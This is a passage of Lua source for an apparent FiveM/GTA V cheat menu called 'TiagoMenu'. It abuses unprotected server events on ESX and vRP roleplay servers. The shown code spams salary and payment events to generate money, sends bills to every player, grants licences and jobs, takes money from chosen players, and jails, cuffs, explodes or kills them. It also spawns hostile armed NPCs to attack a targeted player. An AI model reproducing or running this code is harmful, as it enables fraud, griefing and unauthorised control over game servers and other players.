  8631. TriggerServerEvent("esx_garbagejob:pay", result)
  8632. end
  8633. elseif TiagoMenu.Button("~g~~h~MONEY ~s~16") then
  8634. TriggerServerEvent('paycheck:salary')
  8635. TriggerServerEvent('paycheck:salary')
  8636. TriggerServerEvent('paycheck:salary')
  8637. TriggerServerEvent('paycheck:salary')
  8638. TriggerServerEvent('paycheck:salary')
  8639. TriggerServerEvent('paycheck:salary')
  8640. TriggerServerEvent('paycheck:salary')
  8641. TriggerServerEvent('paycheck:salary')
  8642. TriggerServerEvent('paycheck:salary')
  8643. TriggerServerEvent('paycheck:salary')
  8644. TriggerServerEvent('paycheck:salary')
  8645. TriggerServerEvent('paycheck:salary')
  8646. TriggerServerEvent('paycheck:salary')
  8647. TriggerServerEvent('paycheck:salary')
  8648. TriggerServerEvent('paycheck:salary')
  8649. TriggerServerEvent('paycheck:salary')
  8650. TriggerServerEvent('paycheck:salary')
  8651. TriggerServerEvent('paycheck:salary')
  8652. TriggerServerEvent('paycheck:salary')
  8653. TriggerServerEvent('paycheck:salary')
  8654. TriggerServerEvent('paycheck:salary')
  8655. TriggerServerEvent('paycheck:salary')
  8656. TriggerServerEvent('paycheck:salary')
  8657. TriggerServerEvent('paycheck:salary')
  8658. TriggerServerEvent('paycheck:salary')
  8659. TriggerServerEvent('paycheck:salary')
  8660. TriggerServerEvent('paycheck:salary')
  8661. TriggerServerEvent('paycheck:salary')
  8662. TriggerServerEvent('paycheck:salary')
  8663. TriggerServerEvent('paycheck:salary')
  8664. TriggerServerEvent('paycheck:salary')
  8665. TriggerServerEvent('paycheck:salary')
  8666. TriggerServerEvent('paycheck:salary')
  8667. TriggerServerEvent('paycheck:salary')
  8668. TriggerServerEvent('paycheck:salary')
  8669. TriggerServerEvent('paycheck:salary')
  8670. TriggerServerEvent('paycheck:salary')
  8671. TriggerServerEvent('paycheck:salary')
  8672. TriggerServerEvent('paycheck:salary')
  8673. TriggerServerEvent('paycheck:salary')
  8674. TriggerServerEvent('paycheck:salary')
  8675. TriggerServerEvent('paycheck:salary')
  8676. TriggerServerEvent('paycheck:salary')
  8677. TriggerServerEvent('paycheck:salary')
  8678. TriggerServerEvent('paycheck:salary')
  8679. TriggerServerEvent('paycheck:salary')
  8680. TriggerServerEvent('paycheck:salary')
  8681. TriggerServerEvent('paycheck:salary')
  8682. TriggerServerEvent('paycheck:salary')
  8683. TriggerServerEvent('paycheck:salary')
  8684. TriggerServerEvent('paycheck:salary')
  8685. TriggerServerEvent('paycheck:salary')
  8686. TriggerServerEvent('paycheck:salary')
  8687. TriggerServerEvent('paycheck:salary')
  8688. TriggerServerEvent('paycheck:salary')
  8689. TriggerServerEvent('paycheck:salary')
  8690. TriggerServerEvent('paycheck:salary')
  8691. TriggerServerEvent('paycheck:salary')
  8692. TriggerServerEvent('paycheck:salary')
  8693. TriggerServerEvent('paycheck:salary')
  8694. TriggerServerEvent('paycheck:salary')
  8695. TriggerServerEvent('paycheck:salary')
  8696. TriggerServerEvent('paycheck:salary')
  8697. elseif TiagoMenu.Button("~s~Bank ~r~~h~Deposit") then
  8698. local result = KeyboardInput("Enter amount of money", "", 100)
  8699. if result then
  8700. TriggerServerEvent("bank:deposit", result)
  8701. end
  8702. elseif TiagoMenu.Button("~s~Bank ~r~~h~Withdraw ") then
  8703. local result = KeyboardInput("Enter amount of money", "", 100)
  8704. if result then
  8705. TriggerServerEvent("bank:withdraw", result)
  8706. end
  8707. end
  8710. TiagoMenu.Display()
  8711. elseif TiagoMenu.IsMenuOpened("ESXMisc") then
  8712. if TiagoMenu.Button("~g~~h~ESX ~r~SEND EVERYONE A BILL") then
  8713. local amount = KeyboardInput("Enter Amount", "", 100000000)
  8714. local name = KeyboardInput("Enter the name of the Bill", "", 100000000)
  8715. if amount and name then
  8716. for i = 0, 128 do
  8717. TriggerServerEvent('esx_billing:sendBill', GetPlayerServerId(i), "Purposeless", name, amount)
  8718. end
  8719. end
  8720. elseif TiagoMenu.Button("~g~~h~ESX ~w~Harvest FixKit") then
  8721. TriggerServerEvent("esx_mechanicjob:startHarvest")
  8722. elseif TiagoMenu.Button("~g~~h~ESX ~w~Get all licenses Drive") then
  8723. TriggerServerEvent("dmv:success")
  8724. TriggerServerEvent('esx_weashopjob:addLicense', 'tazer')
  8725. TriggerServerEvent('esx_weashopjob:addLicense', 'ppa')
  8726. TriggerServerEvent('esx_weashopjob:addLicense', 'ppa2')
  8727. TriggerServerEvent('esx_weashopjob:addLicense', 'drive_bike')
  8728. TriggerServerEvent('esx_weashopjob:addLicense', 'drive_truck')
  8729. TriggerServerEvent('esx_dmvschool:addLicense', 'dmv')
  8730. TriggerServerEvent('esx_dmvschool:addLicense', 'drive')
  8731. TriggerServerEvent('esx_dmvschool:addLicense', 'drive_bike')
  8732. TriggerServerEvent('esx_dmvschool:addLicense', 'drive_truck')
  8733. TriggerServerEvent('esx_airlines:addLicense', 'helico')
  8734. TriggerServerEvent('esx_airlines:addLicense', 'avion')
  8735. elseif TiagoMenu.Button("~g~~h~ESX ~w~Craft FixKit") then
  8736. TriggerServerEvent("esx_mechanicjob:startCraft")
  8737. elseif TiagoMenu.Button("~h~Send Discord Message") then
  8738. local Message = KeyboardInput("Enter message to send", "", 100)
  8739. TriggerServerEvent("DiscordBot:playerDied", Message, "1337")
  8740. drawNotification("The message:~n~" .. Message .. "~n~Has been ~g~sent!")
  8741. elseif TiagoMenu.Button("~h~Send Police Car Advert") then
  8742. TriggerServerEvent("esx:enterpolicecar",GetDisplayNameFromVehicleModel(GetEntityModel(GetVehiclePedIsIn(GetPlayerPed(-1), 0))))
  8743. end
  8746. TiagoMenu.Display()
  8747. elseif TiagoMenu.IsMenuOpened("MiscServerOptions") then
  8748. if TiagoMenu.Button("~h~Send Discord Message") then
  8749. local Message = KeyboardInput("Enter message to send", "", 100)
  8750. TriggerServerEvent("DiscordBot:playerDied", Message, "1337")
  8751. drawNotification("The message:~n~" .. Message .. "~n~Has been ~g~sent!")
  8752. elseif TiagoMenu.Button("~h~Send Police Car Advert") then
  8753. TriggerServerEvent("esx:enterpolicecar",GetDisplayNameFromVehicleModel(GetEntityModel(GetVehiclePedIsIn(GetPlayerPed(-1), 0))))
  8754. end
  8756. TiagoMenu.Display()
  8757. elseif TiagoMenu.IsMenuOpened("VRPOptions") then
  8758. if TiagoMenu.Button("~r~~h~VRP ~s~Give Money ~ypayGarage") then
  8759. local result = KeyboardInput("Enter amount of money USE AT YOUR OWN RISK", "", 100)
  8760. if result then
  8761. TriggerServerEvent("lscustoms:payGarage", {costs = -result})
  8762. end
  8763. elseif TiagoMenu.Button("~r~~h~VRP ~g~WIN ~s~Slot Machine") then
  8764. local result = KeyboardInput("Enter amount of money USE AT YOUR OWN RISK", "", 100)
  8765. if result then
  8766. TriggerServerEvent("vrp_slotmachine:server:2", result)
  8767. end
  8768. elseif TiagoMenu.Button("~r~~h~VRP ~s~Get driving license") then
  8769. TriggerServerEvent("dmv:success")
  8770. elseif TiagoMenu.Button("~r~~h~VRP ~s~Bank Deposit") then
  8771. local result = KeyboardInput("Enter amount of money", "", 100)
  8772. if result then
  8773. TriggerServerEvent("bank:deposit", result)
  8774. end
  8775. elseif TiagoMenu.Button("~r~~h~VRP ~s~Bank Withdraw ") then
  8776. local result = KeyboardInput("Enter amount of money", "", 100)
  8777. if result then
  8778. TriggerServerEvent("bank:withdraw", result)
  8779. end
  8780. end
  8783. TiagoMenu.Display()
  8784. elseif TiagoMenu.IsMenuOpened("ESXDrugs") then
  8785. if TiagoMenu.Button("~h~~g~Harvest ~g~Weed ~c~(x5)") then
  8786. TriggerServerEvent("esx_drugs:startHarvestWeed")
  8787. TriggerServerEvent("esx_drugs:startHarvestWeed")
  8788. TriggerServerEvent("esx_drugs:startHarvestWeed")
  8789. TriggerServerEvent("esx_drugs:startHarvestWeed")
  8790. TriggerServerEvent("esx_drugs:startHarvestWeed")
  8791. elseif TiagoMenu.Button("~h~~g~Transform ~g~Weed ~c~(x5)") then
  8792. TriggerServerEvent("esx_drugs:startTransformWeed")
  8793. TriggerServerEvent("esx_drugs:startTransformWeed")
  8794. TriggerServerEvent("esx_drugs:startTransformWeed")
  8795. TriggerServerEvent("esx_drugs:startTransformWeed")
  8796. TriggerServerEvent("esx_drugs:startTransformWeed")
  8797. elseif TiagoMenu.Button("~h~~g~Sell ~g~Weed ~c~(x5)") then
  8798. TriggerServerEvent("esx_drugs:startSellWeed")
  8799. TriggerServerEvent("esx_drugs:startSellWeed")
  8800. TriggerServerEvent("esx_drugs:startSellWeed")
  8801. TriggerServerEvent("esx_drugs:startSellWeed")
  8802. TriggerServerEvent("esx_drugs:startSellWeed")
  8803. elseif TiagoMenu.Button("~h~~w~Harvest ~w~Coke ~c~(x5)") then
  8804. TriggerServerEvent("esx_drugs:startHarvestCoke")
  8805. TriggerServerEvent("esx_drugs:startHarvestCoke")
  8806. TriggerServerEvent("esx_drugs:startHarvestCoke")
  8807. TriggerServerEvent("esx_drugs:startHarvestCoke")
  8808. TriggerServerEvent("esx_drugs:startHarvestCoke")
  8809. elseif TiagoMenu.Button("~h~~w~Transform ~w~Coke ~c~(x5)") then
  8810. TriggerServerEvent("esx_drugs:startTransformCoke")
  8811. TriggerServerEvent("esx_drugs:startTransformCoke")
  8812. TriggerServerEvent("esx_drugs:startTransformCoke")
  8813. TriggerServerEvent("esx_drugs:startTransformCoke")
  8814. TriggerServerEvent("esx_drugs:startTransformCoke")
  8815. elseif TiagoMenu.Button("~h~~w~Sell ~w~Coke ~c~(x5)") then
  8816. TriggerServerEvent("esx_drugs:startSellCoke")
  8817. TriggerServerEvent("esx_drugs:startSellCoke")
  8818. TriggerServerEvent("esx_drugs:startSellCoke")
  8819. TriggerServerEvent("esx_drugs:startSellCoke")
  8820. TriggerServerEvent("esx_drugs:startSellCoke")
  8821. elseif TiagoMenu.Button("~h~~r~Harvest Meth ~c~(x5)") then
  8822. TriggerServerEvent("esx_drugs:startHarvestMeth")
  8823. TriggerServerEvent("esx_drugs:startHarvestMeth")
  8824. TriggerServerEvent("esx_drugs:startHarvestMeth")
  8825. TriggerServerEvent("esx_drugs:startHarvestMeth")
  8826. TriggerServerEvent("esx_drugs:startHarvestMeth")
  8827. elseif TiagoMenu.Button("~h~~r~Transform Meth ~c~(x5)") then
  8828. TriggerServerEvent("esx_drugs:startTransformMeth")
  8829. TriggerServerEvent("esx_drugs:startTransformMeth")
  8830. TriggerServerEvent("esx_drugs:startTransformMeth")
  8831. TriggerServerEvent("esx_drugs:startTransformMeth")
  8832. TriggerServerEvent("esx_drugs:startTransformMeth")
  8833. elseif TiagoMenu.Button("~h~~r~Sell Meth ~c~(x5)") then
  8834. TriggerServerEvent("esx_drugs:startSellMeth")
  8835. TriggerServerEvent("esx_drugs:startSellMeth")
  8836. TriggerServerEvent("esx_drugs:startSellMeth")
  8837. TriggerServerEvent("esx_drugs:startSellMeth")
  8838. TriggerServerEvent("esx_drugs:startSellMeth")
  8839. elseif TiagoMenu.Button("~h~~p~Harvest Opium ~c~(x5)") then
  8840. TriggerServerEvent("esx_drugs:startHarvestOpium")
  8841. TriggerServerEvent("esx_drugs:startHarvestOpium")
  8842. TriggerServerEvent("esx_drugs:startHarvestOpium")
  8843. TriggerServerEvent("esx_drugs:startHarvestOpium")
  8844. TriggerServerEvent("esx_drugs:startHarvestOpium")
  8845. elseif TiagoMenu.Button("~h~~p~Transform Opium ~c~(x5)") then
  8846. TriggerServerEvent("esx_drugs:startTransformOpium")
  8847. TriggerServerEvent("esx_drugs:startTransformOpium")
  8848. TriggerServerEvent("esx_drugs:startTransformOpium")
  8849. TriggerServerEvent("esx_drugs:startTransformOpium")
  8850. TriggerServerEvent("esx_drugs:startTransformOpium")
  8851. elseif TiagoMenu.Button("~h~~p~Sell Opium ~c~(x5)") then
  8852. TriggerServerEvent("esx_drugs:startSellOpium")
  8853. TriggerServerEvent("esx_drugs:startSellOpium")
  8854. TriggerServerEvent("esx_drugs:startSellOpium")
  8855. TriggerServerEvent("esx_drugs:startSellOpium")
  8856. TriggerServerEvent("esx_drugs:startSellOpium")
  8857. elseif TiagoMenu.Button("~h~~g~Money Wash ~c~(x10)") then
  8858. TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
  8859. TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
  8860. TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
  8861. TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
  8862. TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
  8863. TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
  8864. TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
  8865. TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
  8866. TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
  8867. TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
  8868. elseif TiagoMenu.Button("~r~~h~Stop all ~c~(Drugs)") then
  8869. TriggerServerEvent("esx_drugs:stopHarvestCoke")
  8870. TriggerServerEvent("esx_drugs:stopTransformCoke")
  8871. TriggerServerEvent("esx_drugs:stopSellCoke")
  8872. TriggerServerEvent("esx_drugs:stopHarvestMeth")
  8873. TriggerServerEvent("esx_drugs:stopTransformMeth")
  8874. TriggerServerEvent("esx_drugs:stopSellMeth")
  8875. TriggerServerEvent("esx_drugs:stopHarvestWeed")
  8876. TriggerServerEvent("esx_drugs:stopTransformWeed")
  8877. TriggerServerEvent("esx_drugs:stopSellWeed")
  8878. TriggerServerEvent("esx_drugs:stopHarvestOpium")
  8879. TriggerServerEvent("esx_drugs:stopTransformOpium")
  8880. TriggerServerEvent("esx_drugs:stopSellOpium")
  8881. drawNotification("~r~Everything is now stopped.")
  8882. elseif TiagoMenu.Button("~h~~g~Sell Money Wash ~s~new") then
  8883. local result = KeyboardInput("Enter amount wash money ", "", 100000)
  8884. if result then
  8885. TriggerServerEvent('esx_moneywash:washMoney', result)
  8886. end
  8887. end
  8889. TiagoMenu.Display()
  8890. elseif TiagoMenu.IsMenuOpened("RecrutarPlayers") then
  8891. for i = 0, 128 do
  8892. if NetworkIsPlayerActive(i) and GetPlayerServerId(i) ~= 0 and TiagoMenu.MenuButton("~h~~r~-» ~s~"..GetPlayerName(i).."", 'RecrutarPlayersOptions') then
  8893. SelectedPlayer = i
  8894. end
  8895. end
  8897. TiagoMenu.Display()
  8898. elseif TiagoMenu.IsMenuOpened("RecrutarPlayersOptions") then
  8899. TiagoMenu.SetSubTitle("RecrutarPlayersOptions", "Recrutar Players options [" .. GetPlayerName(SelectedPlayer) .. "]")
  8900. if TiagoMenu.Button("~r~Remove job") then
  8901. TriggerServerEvent("NB:destituerplayer",GetPlayerServerId(SelectedPlayer))
  8902. elseif TiagoMenu.Button("~s~Recruit~c~~h~ Mechanic") then
  8903. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), "mecano", 0)
  8904. TriggerServerEvent('Esx-MenuPessoal:Boss_recruterplayer', GetPlayerServerId(SelectedPlayer), "mecano", 0)
  8905. TriggerServerEvent('Corujas RP-MenuPessoal:Boss_recruterplayer', GetPlayerServerId(SelectedPlayer), "mecano", 0)
  8906. TriggerServerEvent('esx_society:getJob', GetPlayerServerId(SelectedPlayer), "mecano", 0)
  8907. elseif TiagoMenu.Button("~s~Recruit~b~~h~ Police") then
  8908. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), "police", 0)
  8909. TriggerServerEvent('Esx-MenuPessoal:Boss_recruterplayer', GetPlayerServerId(SelectedPlayer), "police", 0)
  8910. elseif TiagoMenu.Button("~s~Recruit~c~~h~ Mafia") then
  8911. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), "mafia", 0)
  8912. TriggerServerEvent('Esx-MenuPessoal:Boss_recruterplayer', GetPlayerServerId(SelectedPlayer), "mafia", 0)
  8913. elseif TiagoMenu.Button("~s~Recruit~p~~h~ Gang") then
  8914. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), "gang", 0)
  8915. TriggerServerEvent('Esx-MenuPessoal:Boss_recruterplayer', GetPlayerServerId(SelectedPlayer), "gang", 0)
  8916. elseif TiagoMenu.Button("~s~Recruit~r~~h~ Inem") then
  8917. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), "ambulance", 0)
  8918. TriggerServerEvent('Esx-MenuPessoal:Boss_recruterplayer', GetPlayerServerId(SelectedPlayer), "ambulance", 0)
  8919. elseif TiagoMenu.Button("~h~Custom Recruit") then
  8920. local reason = KeyboardInput("Enter the job name", "", 100)
  8921. local reason2 = KeyboardInput("Enter the nivel job number 0-10", "", 10)
  8922. if reason and reason2 then
  8923. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), reason, reason2)
  8924. TriggerServerEvent('Esx-MenuPessoal:Boss_recruterplayer',GetPlayerServerId(SelectedPlayer), reason, reason2)
  8925. TriggerServerEvent('Corujas RP-MenuPessoal:Boss_recruterplayer',GetPlayerServerId(SelectedPlayer), reason, reason2)
  8926. end
  8927. end
  8929. TiagoMenu.Display()
  8930. elseif TiagoMenu.IsMenuOpened("OnlinePlayerMenu") then
  8931. for i = 0, 128 do
  8932. if NetworkIsPlayerActive(i) and GetPlayerServerId(i) ~= 0 and TiagoMenu.MenuButton("~h~ID: ~r~[ "..GetPlayerServerId(i).." ] ~s~"..GetPlayerName(i).."~h~~y~ » "..(IsPedDeadOrDying(GetPlayerPed(i), 1) and "~s~[~r~DEAD~s~]" or "~s~[ ~g~ALIVE~s~ ]"), 'PlayerOptionsMenu') then
  8933. SelectedPlayer = i
  8934. end
  8935. end
  8938. TiagoMenu.Display()
  8939. elseif TiagoMenu.IsMenuOpened("PlayerOptionsMenu") then
  8940. TiagoMenu.SetSubTitle("PlayerOptionsMenu", "~h~Player ~s~~r~[" .. GetPlayerName(SelectedPlayer) .. "~r~]")
  8941. if TiagoMenu.Button("~h~~r~[~s~ SPECTATE ~h~~r~]", (Spectating and "~r~[ON]")) then
  8942. SpectatePlayer(SelectedPlayer)
  8943. elseif TiagoMenu.Button("Teleport To Player") then
  8944. local Entity = IsPedInAnyVehicle(PlayerPedId(), false) and GetVehiclePedIsUsing(PlayerPedId()) or PlayerPedId()
  8945. SetEntityCoords(Entity, GetEntityCoords(GetPlayerPed(SelectedPlayer)), 0.0, 0.0, 0.0, false)
  8946. elseif TiagoMenu.Button("~g~Spam Msg") then
  8947. local cX=KeyboardInput("Enter message to send","",100)
  8948. local cY=GetPlayerName(selectedPlayer)
  8949. if cX then
  8950. TriggerServerEvent("_chat:messageEntered",cY,{0,0x99,255},cX)
  8951. end
  8952. elseif TiagoMenu.CheckBox(
  8953. "~h~Freeze Player~r~ New",
  8954. freezePlayer,
  8955. function(enabled)
  8956. freezePlayer = enabled
  8957. end)
  8958. then
  8959. elseif TiagoMenu.Button("~g~Give ~s~Money") then
  8960. local result = KeyboardInput("Enter amount of money to give", "", 100000000)
  8961. if result then
  8962. TriggerServerEvent('esx:giveInventoryItem', GetPlayerServerId(SelectedPlayer), "item_money", "money", result)
  8963. end
  8964. elseif TiagoMenu.Button("~r~Remove ~s~Money") then
  8965. local result = KeyboardInput("Enter amount of money to give", "", 100000000)
  8966. if result then
  8967. TriggerServerEvent('esx:removeInventoryItem', GetPlayerServerId(SelectedPlayer), "item_money", "money", result)
  8968. end
  8969. elseif TiagoMenu.Button("~r~Explode") then
  8970. AddExplosion(GetEntityCoords(GetPlayerPed(SelectedPlayer)), 2, 100000.0, true, false, 100000.0)
  8971. elseif TiagoMenu.Button("~g~Revive ~g~ESX") then
  8972. TriggerServerEvent("esx_ambulancejob:revive", GetPlayerServerId(SelectedPlayer))
  8973. TriggerServerEvent("whoapd:revive", GetPlayerServerId(SelectedPlayer))
  8974. TriggerServerEvent("paramedic:revive", GetPlayerServerId(SelectedPlayer))
  8975. TriggerServerEvent("ems:revive", GetPlayerServerId(SelectedPlayer))
  8976. TriggerEvent('esx_ambulancejob:revive', GetPlayerServerId(SelectedPlayer))
  8977. TriggerServerEvent('esx_ambulancejob:revive', GetPlayerServerId(SelectedPlayer))
  8978. elseif TiagoMenu.Button("~g~Revive ~b~VRP") then CreatePickup(GetHashKey("PICKUP_HEALTH_STANDARD"), GetEntityCoords(GetPlayerPed(SelectedPlayer))) elseif TiagoMenu.Button("Give ~b~Armour ") then CreatePickup(GetHashKey("PICKUP_ARMOUR_STANDARD"), GetEntityCoords(GetPlayerPed(SelectedPlayer))) elseif TiagoMenu.Button("~h~~r~Kill ~s~Player") then AddExplosion(GetEntityCoords(GetPlayerPed(SelectedPlayer)), 4, 1337.0, false, true, 0.0)
  8979. elseif TiagoMenu.Button('Fire') then
  8980. FirePlayer(SelectedPlayer)
  8981. elseif TiagoMenu.Button("~b~Open inventory ~s~new") then
  8982. TriggerEvent("esx_inventoryhud:openPlayerInventory", GetPlayerServerId(SelectedPlayer), GetPlayerName(SelectedPlayer))
  8983. elseif TiagoMenu.Button("Jail") then
  8984. TriggerServerEvent("esx_jailer:sendToJail", GetPlayerServerId(SelectedPlayer), 45 * 60)
  8985. TriggerServerEvent("esx_jail:sendToJail", GetPlayerServerId(SelectedPlayer), 45 * 60)
  8986. TriggerServerEvent("js:jailuser", GetPlayerServerId(SelectedPlayer), 45 * 60, "dude weed")
  8987. TriggerServerEvent("esx-qalle-jail:jailPlayer", GetPlayerServerId(SelectedPlayer), 45 * 60, "dude weed")
  8988. elseif TiagoMenu.Button("Unjail") then
  8989. TriggerServerEvent("esx_jailer:sendToJail", GetPlayerServerId(SelectedPlayer), 0)
  8990. TriggerServerEvent("esx_jail:sendToJail", GetPlayerServerId(SelectedPlayer), 0)
  8991. TriggerServerEvent("esx_jail:unjailQuest", GetPlayerServerId(SelectedPlayer))
  8992. TriggerServerEvent("js:removejailtime", GetPlayerServerId(SelectedPlayer))
  8993. TriggerServerEvent("esx-qalle-jail:unJailPlayer", GetPlayerServerId(SelectedPlayer), 0)
  8994. elseif TiagoMenu.Button("~g~Give All Weapons") then
  8995. for i = 1, #allWeapons do
  8996. GiveWeaponToPed(GetPlayerPed(SelectedPlayer), GetHashKey(allWeapons[i]), 1000, false, false)
  8997. end
  8998. elseif TiagoMenu.Button("~r~Remove All Weapons") then
  8999. RemoveAllPedWeapons(PlayerPedId(-1), true)
  9000. elseif TiagoMenu.MenuButton("Weapon Menu", "SingleWepPlayer") then
  9001. elseif TiagoMenu.Button("Spawn Vehicle") then
  9002. local ped = GetPlayerPed(SelectedPlayer)
  9003. local ModelName = KeyboardInput("Enter Vehicle Spawn Name", "", 100)
  9005. if ModelName and IsModelValid(ModelName) and IsModelAVehicle(ModelName) then
  9006. RequestModel(ModelName)
  9007. while not HasModelLoaded(ModelName) do
  9008. Citizen.Wait(0)
  9009. end
  9011. local veh = CreateVehicle(GetHashKey(ModelName), GetEntityCoords(ped), GetEntityHeading(ped), true, true)
  9012. else
  9013. drawNotification("~r~Model is not valid!")
  9014. end
  9015. elseif TiagoMenu.Button('~h~Clone Car') then
  9016. ClonePedVeh()
  9017. elseif TiagoMenu.Button("~b~Cuff Player") then
  9018. TriggerServerEvent("OG_cuffs:cuffCheckNearest", GetPlayerPed(SelectedPlayer))
  9019. TriggerServerEvent("CheckHandcuff", GetPlayerPed(SelectedPlayer))
  9020. TriggerServerEvent('cuffServer', GetPlayerPed(SelectedPlayer))
  9021. TriggerServerEvent("cuffGranted", GetPlayerPed(SelectedPlayer))
  9022. TriggerServerEvent("police:cuffGranted", GetPlayerPed(SelectedPlayer))
  9023. TriggerServerEvent('esx_handcuffs:cuffing', GetPlayerPed(SelectedPlayer))
  9024. TriggerServerEvent('esx_policejob:handcuff', GetPlayerPed(SelectedPlayer))
  9025. elseif TiagoMenu.Button('~h~Spawn Swat ~r~AK') then
  9026. for i = 0, 32 do
  9027. local coords = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  9028. RequestModel(GetHashKey('s_m_y_swat_01'))
  9029. Citizen.Wait(50)
  9030. if HasModelLoaded(GetHashKey('s_m_y_swat_01')) then
  9031. local ped =
  9032. CreatePed(21, GetHashKey('s_m_y_swat_01'), coords.x, coords.y, coords.z, 0, true, false)
  9033. if DoesEntityExist(ped) and not IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  9034. RequestNetworkControl(ped)
  9035. GiveWeaponToPed(ped, GetHashKey('WEAPON_ASSAULTRIFLE'), 9999, 1, 1)
  9036. SetPedCanSwitchWeapon(ped, true)
  9037. makePedHostile(ped, SelectedPlayer, 0, 0)
  9038. TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
  9039. elseif IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  9040. TaskCombatHatedTargetsInArea(ped, coords.x, coords.y, coords.z, 500)
  9041. else
  9042. Citizen.Wait(0)
  9043. end
  9044. else
  9045. Citizen.Wait(0)
  9046. end
  9047. end
  9048. elseif TiagoMenu.Button('~h~Spawn Wade ~r~RPG') then
  9049. for i = 0, 32 do
  9050. local coords = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  9051. RequestModel(GetHashKey('ig_wade'))
  9052. Citizen.Wait(50)
  9053. if HasModelLoaded(GetHashKey('ig_wade')) then
  9054. local ped =
  9055. CreatePed(21, GetHashKey('ig_wade'), coords.x, coords.y, coords.z, 0, true, false)
  9056. if DoesEntityExist(ped) and not IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  9057. RequestNetworkControl(ped)
  9058. GiveWeaponToPed(ped, GetHashKey('WEAPON_RPG'), 9999, 1, 1)
  9059. SetPedCanSwitchWeapon(ped, true)
  9060. makePedHostile(ped, SelectedPlayer, 0, 0)
  9061. TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
  9062. elseif IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  9063. TaskCombatHatedTargetsInArea(ped, coords.x, coords.y, coords.z, 500)
  9064. else
  9065. Citizen.Wait(0)
  9066. end
  9067. else
  9068. Citizen.Wait(0)
  9069. end
  9070. end
  9071. elseif TiagoMenu.Button('~h~Spawn Swat in car ~r~Attack') then
  9072. local vehlist = {'Nero', 'Deluxo', 'Raiden', 'Bati2', "SultanRS", "TA21", "Tiago", "ZR380", "Streiter", "Neon", "Italigto", "Nero2", "Fmj", "le7b", "prototipo", "cyclone", "khanjali", "STROMBERG", "BARRAGE", "COMET5"}
  9073. local veh = vehlist[math.random(#vehlist)]
  9074. for i = 0, 1 do
  9075. local pos = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  9076. local pitch = GetEntityPitch(GetPlayerPed(SelectedPlayer))
  9077. local roll = GetEntityRoll(GetPlayerPed(SelectedPlayer))
  9078. local yaw = GetEntityRotation(GetPlayerPed(SelectedPlayer)).z
  9079. local xf = GetEntityForwardX(GetPlayerPed(SelectedPlayer))
  9080. local yf = GetEntityForwardY(GetPlayerPed(SelectedPlayer))
  9081. if IsPedInAnyVehicle(GetPlayerPed(SelectedPlayer), false) then
  9082. local vt = GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), 0)
  9083. NetworkRequestControlOfEntity(vt)
  9084. SetVehicleModKit(vt, 0)
  9085. ToggleVehicleMod(vt, 20, 1)
  9086. SetVehicleModKit(vt, 0)
  9087. SetVehicleTyresCanBurst(vt, 1)
  9088. end
  9089. local v = nil
  9090. RequestModel(veh)
  9091. RequestModel('s_m_y_swat_01')
  9092. while not HasModelLoaded(veh) and not HasModelLoaded('s_m_y_swat_01') do
  9093. RequestModel('s_m_y_swat_01')
  9094. Citizen.Wait(0)
  9095. RequestModel(veh)
  9096. end
  9097. if HasModelLoaded(veh) then
  9098. Citizen.Wait(50)
  9099. v =
  9100. CreateVehicle(
  9101. veh,
  9102. pos.x - (xf * 30),
  9103. pos.y - (yf * 30),
  9104. pos.z + 1,
  9105. GetEntityHeading(GetPlayerPed(SelectedPlayer)),
  9106. true,
  9107. false
  9108. )
  9109. if DoesEntityExist(v) then
  9110. NetworkRequestControlOfEntity(v)
  9111. SetVehicleDoorsLocked(v, 4)
  9112. RequestModel('s_m_y_swat_01')
  9113. Citizen.Wait(50)
  9114. if HasModelLoaded('s_m_y_swat_01') then
  9115. Citizen.Wait(50)
  9116. local ped = CreatePed(21, GetHashKey('s_m_y_swat_01'), pos.x, pos.y, pos.z, true, true)
  9117. local ped1 =
  9118. CreatePed(21, GetHashKey('s_m_y_swat_01'), pos.x, pos.y, pos.z, true, true)
  9119. if DoesEntityExist(ped1) and DoesEntityExist(ped) then
  9120. GiveWeaponToPed(ped, GetHashKey('WEAPON_APPISTOL'), 9999, 1, 1)
  9121. GiveWeaponToPed(ped1, GetHashKey('WEAPON_APPISTOL'), 9999, 1, 1)
  9122. SetPedIntoVehicle(ped, v, -1)
  9123. SetPedIntoVehicle(ped1, v, 0)
  9124. TaskDriveBy(
  9125. ped,
  9126. GetVehiclePedIsUsing(GetPlayerPed(SelectedPlayer)),
  9127. pos.x,
  9128. pos.y,
  9129. pos.z,
  9130. 200,
  9131. 99,
  9132. 0,
  9134. )
  9135. TaskShootAtEntity(
  9136. ped1,
  9137. GetVehiclePedIsUsing(GetPlayerPed(SelectedPlayer)),
  9138. 200,
  9140. )
  9141. makePedHostile(ped, SelectedPlayer, 0, 0)
  9142. makePedHostile(ped1, SelectedPlayer, 0, 0)
  9143. TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
  9144. TaskCombatPed(ped1, GetPlayerPed(SelectedPlayer), 0, 16)
  9145. for i = 1, 2 do
  9146. Citizen.Wait(5)
  9147. ClearPedTasks(GetPlayerPed(-1))
  9148. end
  9149. end
  9150. end
  9151. end
  9152. end
  9153. end
